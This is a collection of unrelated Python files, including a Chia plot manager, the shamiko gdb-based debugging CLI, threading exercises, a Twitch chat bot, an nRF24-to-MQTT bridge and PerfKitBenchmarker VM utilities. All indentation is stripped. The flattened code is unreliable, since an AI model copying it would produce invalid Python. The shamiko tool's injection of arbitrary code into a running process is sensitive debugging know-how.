mkdir(path.parent)
def __len__(self):
return len(self._data)
def update(self, plot_id: bytes32, entry: CacheEntry):
self._data[plot_id] = entry
self._changed = True
def remove(self, cache_keys: List[bytes32]):
for key in cache_keys:
if key in self._data:
del self._data[key]
self._changed = True
def save(self):
try:
disk_cache: DiskCache = DiskCache(
CURRENT_VERSION, [(plot_id, cache_entry) for plot_id, cache_entry in self.items()]
)
serialized: bytes = bytes(disk_cache)
self._path.write_bytes(serialized)
self._changed = False
log.info(f"Saved {len(serialized)} bytes of cached data")
except Exception as e:
log.error(f"Failed to save cache: {e}, {traceback.format_exc()}")
def load(self):
try:
serialized = self._path.read_bytes()
log.info(f"Loaded {len(serialized)} bytes of cached data")
stored_cache: DiskCache = DiskCache.from_bytes(serialized)
if stored_cache.version != CURRENT_VERSION:
# TODO, Migrate or drop current cache if the version changes.
raise ValueError(f"Invalid cache version {stored_cache.version}. Expected version {CURRENT_VERSION}.")
self._data = {plot_id: cache_entry for plot_id, cache_entry in stored_cache.data}
except FileNotFoundError:
log.debug(f"Cache {self._path} not found")
except Exception as e:
log.error(f"Failed to load cache: {e}, {traceback.format_exc()}")
def keys(self):
return self._data.keys()
def items(self):
return self._data.items()
def get(self, plot_id):
return self._data.get(plot_id)
def changed(self):
return self._changed
def path(self):
return self._path
class PlotManager:
plots: Dict[Path, PlotInfo]
plot_filename_paths: Dict[str, Tuple[str, Set[str]]]
plot_filename_paths_lock: threading.Lock
failed_to_open_filenames: Dict[Path, int]
no_key_filenames: Set[Path]
farmer_public_keys: List[G1Element]
pool_public_keys: List[G1Element]
cache: Cache
match_str: Optional[str]
open_no_key_filenames: bool
last_refresh_time: float
refresh_parameter: PlotsRefreshParameter
log: Any
_lock: threading.Lock
_refresh_thread: Optional[threading.Thread]
_refreshing_enabled: bool
_refresh_callback: Callable
def __init__(
self,
root_path: Path,
refresh_callback: Callable,
match_str: Optional[str] = None,
open_no_key_filenames: bool = False,
refresh_parameter: PlotsRefreshParameter = PlotsRefreshParameter(),
):
self.root_path = root_path
self.plots = {}
self.plot_filename_paths = {}
self.plot_filename_paths_lock = threading.Lock()
self.failed_to_open_filenames = {}
self.no_key_filenames = set()
self.farmer_public_keys = []
self.pool_public_keys = []
self.cache = Cache(self.root_path.resolve() / "cache" / "plot_manager.dat")
self.match_str = match_str
self.open_no_key_filenames = open_no_key_filenames
self.last_refresh_time = 0
self.refresh_parameter = refresh_parameter
self.log = logging.getLogger(__name__)
self._lock = threading.Lock()
self._refresh_thread = None
self._refreshing_enabled = False
self._refresh_callback = refresh_callback # type: ignore
def __enter__(self):
self._lock.acquire()
def __exit__(self, exc_type, exc_value, exc_traceback):
self._lock.release()
def reset(self):
with self:
self.last_refresh_time = time.time()
self.plots.clear()
self.plot_filename_paths.clear()
self.failed_to_open_filenames.clear()
self.no_key_filenames.clear()
def set_refresh_callback(self, callback: Callable):
self._refresh_callback = callback # type: ignore
def set_public_keys(self, farmer_public_keys: List[G1Element], pool_public_keys: List[G1Element]):
self.farmer_public_keys = farmer_public_keys
self.pool_public_keys = pool_public_keys
def public_keys_available(self):
return len(self.farmer_public_keys) and len(self.pool_public_keys)
def plot_count(self):
with self:
return len(self.plots)
def get_duplicates(self):
result = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
_, duplicated_paths = paths_entry
for path in duplicated_paths:
result.append(Path(path) / plot_filename)
return result
def needs_refresh(self) -> bool:
return time.time() - self.last_refresh_time > float(self.refresh_parameter.interval_seconds)
def start_refreshing(self):
self._refreshing_enabled = True
if self._refresh_thread is None or not self._refresh_thread.is_alive():
self.cache.load()
self._refresh_thread = threading.Thread(target=self._refresh_task)
self._refresh_thread.start()
def stop_refreshing(self):
self._refreshing_enabled = False
if self._refresh_thread is not None and self._refresh_thread.is_alive():
self._refresh_thread.join()
self._refresh_thread = None
def trigger_refresh(self):
log.debug("trigger_refresh")
self.last_refresh_time = 0
def _refresh_task(self):
while self._refreshing_enabled:
try:
while not self.needs_refresh() and self._refreshing_enabled:
time.sleep(1)
if not self._refreshing_enabled:
return
plot_filenames: Dict[Path, List[Path]] = get_plot_filenames(self.root_path)
plot_directories: Set[Path] = set(plot_filenames.keys())
plot_paths: List[Path] = []
for paths in plot_filenames.values():
plot_paths += paths
total_result: PlotRefreshResult = PlotRefreshResult()
total_size = len(plot_paths)
self._refresh_callback(PlotRefreshEvents.started, PlotRefreshResult(remaining=total_size))
# First drop all plots we have in plot_filename_paths but not longer in the filesystem or set in config
for path in list(self.failed_to_open_filenames.keys()):
if path not in plot_paths:
del self.failed_to_open_filenames[path]
for path in self.no_key_filenames.copy():
if path not in plot_paths:
self.no_key_filenames.remove(path)
with self:
filenames_to_remove: List[str] = []
for plot_filename, paths_entry in self.plot_filename_paths.items():
loaded_path, duplicated_paths = paths_entry
loaded_plot = Path(loaded_path) / Path(plot_filename)
if loaded_plot not in plot_paths:
filenames_to_remove.append(plot_filename)
if loaded_plot in self.plots:
del self.plots[loaded_plot]
total_result.removed.append(loaded_plot)
# No need to check the duplicates here since we drop the whole entry
continue
paths_to_remove: List[str] = []
for path in duplicated_paths:
loaded_plot = Path(path) / Path(plot_filename)
if loaded_plot not in plot_paths:
paths_to_remove.append(path)
total_result.removed.append(loaded_plot)
for path in paths_to_remove:
duplicated_paths.remove(path)
for filename in filenames_to_remove:
del self.plot_filename_paths[filename]
for remaining, batch in list_to_batches(plot_paths, self.refresh_parameter.batch_size):
batch_result: PlotRefreshResult = self.refresh_batch(batch, plot_directories)
if not self._refreshing_enabled:
self.log.debug("refresh_plots: Aborted")
break
# Set the remaining files since `refresh_batch()` doesn't know them but we want to report it
batch_result.remaining = remaining
total_result.loaded += batch_result.loaded
total_result.processed += batch_result.processed
total_result.duration += batch_result.duration
self._refresh_callback(PlotRefreshEvents.batch_processed, batch_result)
if remaining == 0:
break
batch_sleep = self.refresh_parameter.batch_sleep_milliseconds
self.log.debug(f"refresh_plots: Sleep {batch_sleep} milliseconds")
time.sleep(float(batch_sleep) / 1000.0)
if self._refreshing_enabled:
self._refresh_callback(PlotRefreshEvents.done, total_result)
# Cleanup unused cache
available_ids = set([plot_info.prover.get_id() for plot_info in self.plots.values()])
invalid_cache_keys = [plot_id for plot_id in self.cache.keys() if plot_id not in available_ids]
self.cache.remove(invalid_cache_keys)
self.log.debug(f"_refresh_task: cached entries removed: {len(invalid_cache_keys)}")
if self.cache.changed():
self.cache.save()
self.last_refresh_time = time.time()
self.log.debug(
f"_refresh_task: total_result.loaded {len(total_result.loaded)}, "
f"total_result.removed {len(total_result.removed)}, "
f"total_duration {total_result.duration:.2f} seconds"
)
except Exception as e:
log.error(f"_refresh_callback raised: {e} with the traceback: {traceback.format_exc()}")
self.reset()
def refresh_batch(self, plot_paths: List[Path], plot_directories: Set[Path]) -> PlotRefreshResult:
start_time: float = time.time()
result: PlotRefreshResult = PlotRefreshResult(processed=len(plot_paths))
counter_lock = threading.Lock()
log.debug(f"refresh_batch: {len(plot_paths)} files in directories {plot_directories}")
if self.match_str is not None:
log.info(f'Only loading plots that contain "{self.match_str}" in the file or directory name')
def process_file(file_path: Path) -> Optional[PlotInfo]:
if not self._refreshing_enabled:
return None
filename_str = str(file_path)
if self.match_str is not None and self.match_str not in filename_str:
return None
if (
file_path in self.failed_to_open_filenames
and (time.time() - self.failed_to_open_filenames[file_path])
< self.refresh_parameter.retry_invalid_seconds
):
# Try once every `refresh_parameter.retry_invalid_seconds` seconds to open the file
return None
if file_path in self.plots:
return self.plots[file_path]
entry: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if entry is not None:
loaded_parent, duplicates = entry
if str(file_path.parent) in duplicates:
log.debug(f"Skip duplicated plot {str(file_path)}")
return None
try:
if not file_path.exists():
return None
prover = DiskProver(str(file_path))
log.debug(f"process_file {str(file_path)}")
expected_size = _expected_plot_size(prover.get_size()) * UI_ACTUAL_SPACE_CONSTANT_FACTOR
stat_info = file_path.stat()
# TODO: consider checking if the file was just written to (which would mean that the file is still
# being copied). A segfault might happen in this edge case.
if prover.get_size() >= 30 and stat_info.st_size < 0.98 * expected_size:
log.warning(
f"Not farming plot {file_path}. Size is {stat_info.st_size / (1024**3)} GiB, but expected"
f" at least: {expected_size / (1024 ** 3)} GiB. We assume the file is being copied."
)
return None
cache_entry = self.cache.get(prover.get_id())
if cache_entry is None:
(
pool_public_key_or_puzzle_hash,
farmer_public_key,
local_master_sk,
) = parse_plot_info(prover.get_memo())
# Only use plots that correct keys associated with them
if farmer_public_key not in self.farmer_public_keys:
log.warning(f"Plot {file_path} has a farmer public key that is not in the farmer's pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
pool_public_key: Optional[G1Element] = None
pool_contract_puzzle_hash: Optional[bytes32] = None
if isinstance(pool_public_key_or_puzzle_hash, G1Element):
pool_public_key = pool_public_key_or_puzzle_hash
else:
assert isinstance(pool_public_key_or_puzzle_hash, bytes32)
pool_contract_puzzle_hash = pool_public_key_or_puzzle_hash
if pool_public_key is not None and pool_public_key not in self.pool_public_keys:
log.warning(f"Plot {file_path} has a pool public key that is not in the farmer's pool pk list.")
self.no_key_filenames.add(file_path)
if not self.open_no_key_filenames:
return None
# If a plot is in `no_key_filenames` the keys were missing in earlier refresh cycles. We can remove
# the current plot from that list if its in there since we passed the key checks above.
if file_path in self.no_key_filenames:
self.no_key_filenames.remove(file_path)
local_sk = master_sk_to_local_sk(local_master_sk)
plot_public_key: G1Element = ProofOfSpace.generate_plot_public_key(
local_sk.get_g1(), farmer_public_key, pool_contract_puzzle_hash is not None
)
cache_entry = CacheEntry(pool_public_key, pool_contract_puzzle_hash, plot_public_key)
self.cache.update(prover.get_id(), cache_entry)
with self.plot_filename_paths_lock:
paths: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name)
if paths is None:
paths = (str(Path(prover.get_filename()).parent), set())
self.plot_filename_paths[file_path.name] = paths
else:
paths[1].add(str(Path(prover.get_filename()).parent))
log.warning(f"Have multiple copies of the plot {file_path.name} in {[paths[0], *paths[1]]}.")
return None
new_plot_info: PlotInfo = PlotInfo(
prover,
cache_entry.pool_public_key,
cache_entry.pool_contract_puzzle_hash,
cache_entry.plot_public_key,
stat_info.st_size,
stat_info.st_mtime,
)
with counter_lock:
result.loaded.append(new_plot_info)
if file_path in self.failed_to_open_filenames:
del self.failed_to_open_filenames[file_path]
except Exception as e:
tb = traceback.format_exc()
log.error(f"Failed to open file {file_path}. {e} {tb}")
self.failed_to_open_filenames[file_path] = int(time.time())
return None
log.info(f"Found plot {file_path} of size {new_plot_info.prover.get_size()}")
return new_plot_info
with self, ThreadPoolExecutor() as executor:
plots_refreshed: Dict[Path, PlotInfo] = {}
for new_plot in executor.map(process_file, plot_paths):
if new_plot is not None:
plots_refreshed[Path(new_plot.prover.get_filename())] = new_plot
self.plots.update(plots_refreshed)
result.duration = time.time() - start_time
self.log.debug(
f"refresh_batch: loaded {len(result.loaded)}, "
f"removed {len(result.removed)}, processed {result.processed}, "
f"remaining {result.remaining}, batch_size {self.refresh_parameter.batch_size}, "
f"duration: {result.duration:.2f} seconds"
)
return result
|
cli.py
|
from __future__ import absolute_import
import contextlib
import os
import subprocess
import tempfile
import threading
import time
from typing import Callable, Iterator, Optional
import click
import jinja2
import shamiko
from shamiko import proc_utils, session_utils
from shamiko.gdb_rpc import (
FrameWrapper,
GdbWrapper,
InferiorWrapper,
ThreadWrapper,
)
from shamiko.session import Session
@click.group()
@click.argument("pid", type=int, required=True)
@click.option("--executable", "-e", type=str, default=None)
@click.option("--context", "-c", type=str, default=None)
@click.pass_context
def cli(ctx, pid, executable, context):
# type: (click.Context, int, Optional[str], Optional[str]) -> None
if not proc_utils.pid_exists(pid):
click.echo("Pid={} doesn't exists.".format(pid))
ctx.obj = {}
ctx.obj["pid"] = pid
ctx.obj["executable"] = executable
ctx.obj["context"] = context
@contextlib.contextmanager
def _get_session(ctx):
# type: (click.Context) -> Iterator[Session]
with session_utils.create_session(
ctx.obj["pid"], ctx.obj["executable"], ctx.obj["context"]
) as session:
yield session
@contextlib.contextmanager
def _get_inferior(ctx):
# type: (click.Context) -> Iterator[InferiorWrapper]
with _get_session(ctx) as s:
inferior = s.session.get_inferior()[0]
yield inferior
def _run(
ctx, # type: click.Context
func, # type: Callable[[FrameWrapper], bool]
thread, # type: Optional[int]
frame, # type: Optional[int]
):
# type: (...) -> bool
with _get_inferior(ctx) as inferior:
return session_utils.traverse_frame(inferior, func, thread, frame)
def _print_result_message(result):
# type: (bool) -> None
if result:
click.echo("Ran successfully")
else:
click.echo(
"Traversed all matched frames, but couldn't run successfully"
)
click.echo("HINT: Try without --thread or --frame option")
@cli.command(help="inspect the running process")
@click.pass_context
def inspect(ctx):
# type: (click.Context) -> None
def visit_thread(thread):
# type: (ThreadWrapper) -> bool
args = {
"num": thread.num,
"global_num": thread.global_num,
"ptid": thread.ptid,
"name": thread.name,
"is_running": thread.is_running,
"is_exited": thread.is_exited,
"is_stopped": thread.is_stopped,
}
fmt = """=== Frame [num={num}] ===
- name: {name}
- ptid: {ptid}
- global_num: {global_num}
- is_running: {is_running}
- is_exited: {is_exited}
- is_stopped: {is_stopped}
- available python frames"""
click.echo(fmt.format(**args))
return True
def visit_frame(frame):
# type: (FrameWrapper) -> bool
description = "(Unknown Frame)"
if frame.is_evalframe:
description = "(unable to read python frame information)"
try:
filename = frame.filename
line_num = frame.current_line_num
description = "File={}:{}".format(filename, line_num)
except Exception:
pass # NOQA
else:
info = frame.is_other_python_frame
if info:
description = info
fmt = " * Frame #{}: {}".format(frame.get_index(), description)
click.echo(fmt)
return True
with _get_inferior(ctx) as inferior:
session_utils.visit(
inferior, visit_thread, visit_frame, lambda _: False
)
@cli.command(help="inject a python script file into the running process")
@click.argument("file_path", type=click.Path(exists=True))
@click.option("--thread", type=int, default=None)
@click.option("--frame", type=int, default=None)
@click.pass_context
def run_file(ctx, file_path, thread, frame):
# type: (click.Context, str, Optional[int], Optional[int]) -> None
def impl(frame):
# type: (FrameWrapper) -> bool
try:
frame.run_file(file_path)
except Exception:
return False
return True
_print_result_message(_run(ctx, impl, thread, frame))
@cli.command(help="inject a python code into the running process")
@click.argument("script", type=str)
@click.option("--thread", type=int, default=None)
@click.option("--frame", type=int, default=None)
@click.pass_context
def run_script(ctx, script, thread, frame):
# type: (click.Context, str, Optional[int], Optional[int]) -> None
def impl(frame):
# type: (FrameWrapper) -> bool
try:
frame.run_simple_string(script)
except Exception:
return False
return True
_print_result_message(_run(ctx, impl, thread, frame))
AVAILABLE_DEBUGGERS = [
"pdb",
]
@cli.command(help="attach a debugger to the running process")
@click.option("--thread", type=int, default=None)
@click.option("--frame", type=int, default=None)
@click.option(
"--debugger", type=click.Choice(AVAILABLE_DEBUGGERS), default=None
)
@click.pass_context
def attach(ctx, thread, frame, debugger):
# type: (click.Context, Optional[int], Optional[int], Optional[str]) -> None
debugger = debugger or "pdb"
assert debugger in AVAILABLE_DEBUGGERS
template_name = "attach_{}.py.template".format(debugger)
template_dir = shamiko._get_template_dir()
env = jinja2.Environment(
autoescape=False, loader=jinja2.FileSystemLoader(template_dir)
)
template = env.get_template(template_name)
disposed = threading.Event()
with tempfile.TemporaryDirectory(prefix="shamiko_dbg_") as session_root:
socket_path = os.path.join(session_root, "proc.sock")
script_path = os.path.join(session_root, "script.py")
script = template.render(unix_socket_path=socket_path)
with open(script_path, "w") as f:
f.write(script)
def connect_stream():
# type: () -> None
dt = 0.1
wait_sec = 100.0
max_counter = int(wait_sec / dt)
for i in range(max_counter):
if os.path.exists(socket_path) or disposed.is_set():
break
if i % 10 == 0:
click.echo("waiting for the session to get ready...")
time.sleep(dt)
else:
raise RuntimeError("couldn't open socket. something went wrong")
if disposed.is_set():
return
process = subprocess.Popen(["nc", "-U", socket_path],)
click.echo("session opened")
while True:
if process.poll() is not None:
return
time.sleep(dt)
def impl(frame):
# type: (FrameWrapper) -> bool
try:
frame.run_file(script_path)
except Exception:
return False
return True
t = threading.Thread(target=connect_stream)
t.start()
try:
ret = _run(ctx, impl, thread, frame)
if not ret:
# show message only when traversing is failed
_print_result_message(ret)
finally:
disposed.set()
t.join()
def _launch_ipshell(pid, session):
# type: (int, GdbWrapper) -> None
from IPython.terminal.embed import InteractiveShellEmbed
from IPython.config.loader import Config
banner = """
=== SHAMIKO SHELL ===
Opened a session to pid={}. You can access it from the variable `session`.
=====================
""".format(
pid
)
ipshell = InteractiveShellEmbed(
config=Config(), banner1=banner, exit_msg="Bye."
)
ipshell()
@cli.command(help="launch an interactive shell")
@click.pass_context
def shell(ctx):
# type: (click.Context) -> None
with _get_session(ctx) as session:
_launch_ipshell(ctx.obj["pid"], session.session)
if __name__ == "__main__":
cli()
|
el_cruce_rio.py
|
from threading import Semaphore,Thread
from time import sleep
import random
hackers=0
serfs=0
lista_hackeres=Semaphore(0)
lista_serfs=Semaphore(0)
total=4
mutex_balsa=Semaphore(1)
def hacker(num):
global hackers,serfs,esCap
#print("hacker %d esperando ..." %num)
mutex_balsa.acquire()
hackers+=1
print("hacker %d subiendo a la balsa" %num)
if hackers == 4:
for i in range(total):
lista_hackeres.release()
hackers=0
print("*** Zarpando la balsa")
elif serfs >= 2 and hackers==2:
for i in range(2):
lista_hackeres.release()
lista_serfs.release()
serfs-=2
hackers=0
print("*** Zarpando la balsa")
mutex_balsa.release()
lista_hackeres.acquire()
def serf(num):
global hackers,serfs, esCap
#print("serf %d esperando ..." %num)
mutex_balsa.acquire()
print("serf %d subiendo a la balsa" %num)
serfs+=1
if serfs == 4:
for i in range(total):
lista_serfs.release()
serfs=0
print("*** Zarpando a la balsa")
elif hackers >= 2 and serfs==2:
for i in range(2):
lista_serfs.release()
lista_hackeres.release()
hackers-=2
serfs=0
print("*** Zarpando a la balsa" )
mutex_balsa.release()
lista_serfs.acquire()
for i in range(12):
Thread(target=hacker, args=[i]).start()
for i in range(16):
Thread(target=serf, args=[i]).start()
|
3.event.py
|
'''
说明: 用于线程通讯, 一个线程完成之后,通知其他的线程
'''
from threading import Event, Thread
def work(event: Event):
print('员工:工作完成')
event.set()
def boss(event: Event):
print('老板:分配工作')
w = Thread(target=work, args=(event,))
w.start()
event.wait()
print('老板:good job')
def main():
event = Event()
b = Thread(target=boss, args=(event,))
b.start()
if __name__ == '__main__':
main()
|
main.py
|
"""
Run this file to open the bot.
Change the contents of if __name__ == '__main__'
to change bot behaviour for testing purposes. For example,
you may call test_beeps_and_browser() to see how loud the notification is.
Change the contents of properties.yml to
change the runtime behaviour of the bot.
This script is licensed by the MIT License.
See LICENSE for more information.
"""
import yaml
import pathlib
import socket
import logging
import webbrowser
from playsound import playsound
import datetime
import threading as th
logging.basicConfig(level=logging.DEBUG)
def load_properties() -> dict:
# Project root directory
root = ROOT
with open(root + '\properties.yml', 'r') as f:
data = yaml.safe_load(f)
logging.info('Loaded ' + root + '\properties.yml')
logging.info('Found the following keywords: ')
keywords = '\nl - '.join(
f'({", ".join(kw for kw in kw_set["required"].split())}) opens {kw_set["open"]}'
for kw_set in data['keywords'])
logging.info(keywords)
return data
def test_beeps_and_browser():
webbrowser.open('https://google.ca')
playsound(ROOT + '\\' + PROPERTIES['notify']['sound'])
def alert(kw_set: dict[str, str]):
webbrowser.open(kw_set['open'])
playsound(ROOT + '\\' + PROPERTIES['notify']['sound'])
KEEP_RUNNING = True
def keyboard_thread_init():
thread = th.Thread(target=keyboard_thread, args=())
thread.start()
def keyboard_thread():
global KEEP_RUNNING
while True:
x = input('To escape back to the main screen, enter "q": \nl')
if x == 'q':
KEEP_RUNNING = False
return
def run_bot():
# Create new thread for keyboard
keyboard_thread_init()
while KEEP_RUNNING:
resp = SOCK.recv(2048).decode('utf-8')
if len(resp) == 0:
# Ignore message
pass
# Twitch will send you a PING which you
# will have to respond with every 5 mins
elif resp.startswith('PING'):
SOCK.send("PONG\n".encode('utf-8'))
else:
for kw_set in PROPERTIES['keywords']:
keywords_match = all(req in resp
for req in kw_set['required'].split())
if keywords_match:
alert(kw_set)
log_text = datetime.datetime.now().strftime('%H:%M:%S ') + resp
logging.info(log_text)
def interface():
"""The main UI for accessing tests and bot functionality from command line"""
global KEEP_RUNNING
while True:
x = input('Enter "test" to test sounds or "run" to run the bot: ')
if x == 'test':
test_beeps_and_browser()
elif x == 'run':
logging.info('Press "q" to return back to this menu.')
KEEP_RUNNING = True
run_bot()
elif x == 'q':
logging.info('Aborting the script...')
return
# Load Properties
ROOT = str(pathlib.Path(__file__).parent.absolute())
PROPERTIES = load_properties()
# Connect to socket
SOCK = socket.socket()
SOCK.connect((PROPERTIES['socket']['url'], PROPERTIES['socket']['port']))
# Send information on where to connect
SOCK.send(f"PASS {PROPERTIES['login']['token']}\n".encode('utf-8'))
SOCK.send(f"NICK {PROPERTIES['login']['nickname']}\n".encode('utf-8'))
SOCK.send(f"JOIN {PROPERTIES['login']['channel']}\n".encode('utf-8'))
if __name__ == '__main__':
breakpoint()
interface()
pass
|
nrf24_manager.py
|
#! venv/bin/python
import yaml
import paho.mqtt.client as mqtt
import logging
import sys
import time
import threading
from RF24 import RF24, RF24_PA_LOW, RF24_250KBPS, RF24_CRC_8
import RPi.GPIO as GPIO
class Nrf24Manager:
def __init__(self, radio_config_file: str, mqtt_config_file: str):
# load config
with open(radio_config_file, 'r') as radio_config_file_content:
self.__radio_config = yaml.safe_load(radio_config_file_content)
with open(mqtt_config_file, 'r') as mqtt_config_file_content:
self.__mqtt_config = yaml.safe_load(mqtt_config_file_content)
# setup led
GPIO.setmode(GPIO.BOARD)
GPIO.setup(self.__radio_config["led_pin"], GPIO.OUT)
GPIO.output(self.__radio_config["led_pin"], GPIO.LOW)
self.__threaded_blink(num_blinks=3)
# setup writing interface
self.__writing_triggered = False
self.__writing_payload = None
# setup mqtt
self.__client = mqtt.Client()
self.__client.on_connect = self.__on_connect
self.__client.on_message = self.__on_message
self.__client.username_pw_set(self.__mqtt_config["user"], password=self.__mqtt_config["password"])
logging.info(f"Try to connected to MQTT broker \"{self.__mqtt_config['host']}\" at port \"{self.__mqtt_config['port']}\".")
self.__client.connect(self.__mqtt_config["host"], self.__mqtt_config["port"], 60)
self.__client.loop_start()
# setup rf24 radio
self.__radio = RF24(self.__radio_config["ce_pin"], self.__radio_config["cs_pin"])
if not self.__radio.begin():
raise RuntimeError("RF24 hardware is not responding. Maybe the pins are not correct.")
self.__radio.setChannel(self.__radio_config["channel"])
if not self.__radio.setDataRate(RF24_250KBPS):
raise RuntimeError("Could not set radio data rate correctly.")
self.__radio.setAutoAck(True)
self.__radio.enableDynamicPayloads()
self.__radio.setCRCLength(RF24_CRC_8)
self.__radio.setPALevel(RF24_PA_LOW)
if not self.__radio.isPVariant():
logging.warning("Warning: The radio is not a nRF24L01+ radio.")
#self.__radio.setPayloadSize(self.__radio_config["payload_size"])
#self.__radio.setRetries(self.__radio_config["retry_delay"], self.__radio_config["max_retries"])
logging.info(f'Opening writing pipe 0 with address "{self.__radio_config["pipes"]["writing"]["address"]}".')
self.__radio.openWritingPipe(self.__radio_config["pipes"]["writing"]["address"].encode('utf-8'))
for pipe_idx, reading_pipe in enumerate(self.__radio_config["pipes"]["reading"]):
logging.info(f'Opening reading pipe {pipe_idx + 1} with address "{reading_pipe["address"]}".')
self.__radio.openReadingPipe(pipe_idx + 1, reading_pipe["address"].encode('utf-8'))
self.__radio.startListening()
# enter loop
try:
while True:
self.__loop()
time.sleep(0.01)
except KeyboardInterrupt:
self.__radio.powerDown()
self.__client.loop_stop()
sys.exit()
def __loop(self):
# receive message
available, pipe = self.__radio.available_pipe()
if available:
receive_payload = self.__radio.read(self.__radio_config["payload_size"])
pipe_config = self.__radio_config["pipes"]["reading"][pipe - 1]
try:
receive_payload = receive_payload.split(b'\x00')[0]
receive_payload_str = receive_payload.decode('utf-8')
logging.info(f'Got radio message in pipe "{pipe_config["address"]}" with payload "{receive_payload_str}".')
topic = pipe_config["topic"]
if receive_payload_str.startswith("["):
if receive_payload_str.startswith("[c]") or receive_payload_str.startswith("[confirm]"):
logging.info('Message confirmed.')
return
else:
receive_payload_str_split = receive_payload_str.split("] ")
subtopic = receive_payload_str_split[0].replace("[", "")
receive_payload_str = "] ".join(receive_payload_str_split[1:])
topic += subtopic
logging.info(f"Pubish payload \"{receive_payload_str}\" in MQTT topic \"{topic}\".")
self.__client.publish(topic, payload=receive_payload_str, qos=2)
if pipe_config["blink"]:
self.__threaded_blink(num_blinks=2)
except UnicodeDecodeError:
logging.warning(f'Got radio message in pipe "{pipe_config["address"]}", but could not decode payload. Most likely the message got corrupted. Received payload="{receive_payload}".')
if pipe_config["blink"]:
self.__threaded_blink(num_blinks=5)
# send message
if self.__writing_triggered:
self.__writing_triggered = False
encoded_payload = self.__writing_payload.encode('utf-8')
encoded_payload = encoded_payload[:32]
logging.info(f'Send payload "{encoded_payload}" via radio in pipe "{self.__radio_config["pipes"]["writing"]["address"]}".')
self.__radio.stopListening()
if not self.__radio.write(encoded_payload):
logging.warning("Sending the message via radio was not successful.")
self.__radio.startListening()
if self.__radio_config["pipes"]["writing"]["blink"]:
self.__threaded_blink(num_blinks=1)
def __threaded_blink(self, num_blinks: int):
blink_thread = threading.Thread(target=self.__blink, args=(num_blinks,))
blink_thread.start()
def __blink(self, num_blinks: int):
for blink_idx in range(num_blinks):
GPIO.output(self.__radio_config["led_pin"], GPIO.HIGH)
time.sleep(0.1)
GPIO.output(self.__radio_config["led_pin"], GPIO.LOW)
time.sleep(0.1)
def __on_connect(self, client, _userdata, _flags, return_code):
logging.info(f"Connected to MQTT broker with result code \"{return_code}\".")
client.subscribe(self.__radio_config["pipes"]["writing"]["topic"])
logging.info(f"Subscribed to MQTT topic {self.__radio_config['pipes']['writing']['topic']}.")
def __on_message(self, _client, _userdata, msg):
payload = msg.payload.decode("utf-8")
logging.info(f"MQTT writing command with payload: {payload}")
self.__writing_payload = payload
self.__writing_triggered = True
if __name__ == "__main__":
# setup logging
logging.basicConfig(format='%(asctime)s %(levelname)-8s %(message)s', level=logging.DEBUG, datefmt='%Y-%m-%d %H:%M:%S', stream=sys.stdout)
logging.info("Start Nrf24 Manager.")
radio_config_file = "./radio_config.yaml"
mqtt_config_file = "./mqtt_config.yaml"
Nrf24Manager(radio_config_file=radio_config_file, mqtt_config_file=mqtt_config_file)
|
vm_util.py
|
# Copyright 2014 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Set of utility functions for working with virtual machines."""
import contextlib
import logging
import os
import platform
import random
import re
import string
import subprocess
import tempfile
import threading
import time
import jinja2
from perfkitbenchmarker import background_tasks
from perfkitbenchmarker import data
from perfkitbenchmarker import errors
from perfkitbenchmarker import flags
from perfkitbenchmarker import temp_dir
FLAGS = flags.FLAGS
PRIVATE_KEYFILE = 'perfkitbenchmarker_keyfile'
PUBLIC_KEYFILE = 'perfkitbenchmarker_keyfile.pub'
CERT_FILE = 'perfkitbenchmarker.pem'
# The temporary directory on VMs. We cannot reuse GetTempDir()
# because run_uri will not be available at time of module load and we need
# to use this directory as a base for other module level constants.
VM_TMP_DIR = '/tmp/pkb'
# Default timeout for issuing a command.
DEFAULT_TIMEOUT = 300
# Defaults for retrying commands.
POLL_INTERVAL = 30
TIMEOUT = 1200
FUZZ = .5
MAX_RETRIES = -1
WINDOWS = 'nt'
DARWIN = 'Darwin'
PASSWORD_LENGTH = 15
OUTPUT_STDOUT = 0
OUTPUT_STDERR = 1
OUTPUT_EXIT_CODE = 2
_SIMULATE_MAINTENANCE_SEMAPHORE = threading.Semaphore(0)
flags.DEFINE_integer('default_timeout', TIMEOUT, 'The default timeout for '
'retryable commands in seconds.')
flags.DEFINE_integer('burn_cpu_seconds', 0,
'Amount of time in seconds to burn cpu on vm before '
'starting benchmark')
flags.DEFINE_integer('burn_cpu_threads', 1, 'Number of threads to use to '
'burn cpu before starting benchmark.')
flags.DEFINE_integer('background_cpu_threads', None,
'Number of threads of background cpu usage while '
'running a benchmark')
flags.DEFINE_integer('background_network_mbits_per_sec', None,
'Number of megabits per second of background '
'network traffic to generate during the run phase '
'of the benchmark')
flags.DEFINE_boolean('simulate_maintenance', False,
'Whether to simulate VM maintenance during the benchmark. '
'This requires both benchmark and provider support.')
flags.DEFINE_integer('simulate_maintenance_delay', 0,
'The number of seconds to wait to start simulating '
'maintenance.')
flags.DEFINE_boolean('ssh_reuse_connections', False,
'Whether to reuse SSH connections rather than '
'reestablishing a connection for each remote command.')
flags.DEFINE_integer('ssh_server_alive_interval', 30,
'Value for ssh -o ServerAliveInterval. Use with '
'--ssh_server_alive_count_max to configure how long to '
'wait for unresponsive servers.')
flags.DEFINE_integer('ssh_server_alive_count_max', 10,
'Value for ssh -o ServerAliveCountMax. Use with '
'--ssh_server_alive_interval to configure how long to '
'wait for unresponsive servers.')
class IpAddressSubset(object):
"""Enum of options for --ip_addresses."""
REACHABLE = 'REACHABLE'
BOTH = 'BOTH'
INTERNAL = 'INTERNAL'
EXTERNAL = 'EXTERNAL'
ALL = (REACHABLE, BOTH, INTERNAL, EXTERNAL)
flags.DEFINE_enum('ip_addresses', IpAddressSubset.REACHABLE,
IpAddressSubset.ALL,
'For networking tests: use both internal and external '
'IP addresses (BOTH), external and internal only if '
'the receiving VM is reachable by internal IP (REACHABLE), '
'external IP only (EXTERNAL) or internal IP only (INTERNAL)')
